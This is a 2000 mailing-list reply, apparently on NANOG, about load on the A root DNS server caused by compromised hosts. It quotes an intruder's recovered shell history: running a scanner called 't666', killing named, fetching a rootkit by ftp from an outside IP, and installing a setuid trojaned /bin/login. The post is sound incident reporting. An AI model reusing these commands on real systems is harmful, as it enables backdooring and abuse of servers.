Re: Question about strain on the A root server

[John Fraizer <nanog () EnterZone Net>]

On Sun, 23 Apr 2000 jlewis () lewis org wrote:

> If you're looking at the stats enough to pin down heavy usage to
> individual systems, it shouldn't be too much more work to track down why
> they're suddenly making the top ten list.  i.e. is it a bug in their
> resolver, or were they hacked and running some scanner kit that makes
> heavy use of DNS, with A hard-coded into the scanner?


While investigating several recent breakins on client machines, I have
found that the latter is most likely the case:

> From the .bash_history file that was found on one of the machines:

./t666 1
killall -9 named
./t666 1
./t666 1
./t666 1
ftp 62.0.178.10
tar -zxvf login.tgz
cd login
pico rk.h
./configure
make
cd src
mv login /bin
chmod 4755 /bin/login
ls -ls /bin/login


Sadly, the t666 program was not anywhere to be found on the machine.  The
machine that was compromised was a clients nameserver.  It was configured
to use our nameservers as forwarders.  When the script-kiddy was running
the t666 program, it was beating the hell out of our nameservers.  Alarms
went off, we checked the logs and showed thousands of connections open
from their nameserver to ours.  When we got into the box, the login.tgz
and .bash_history file are all that was to be found.

----
John Fraizer
EnterZone, Inc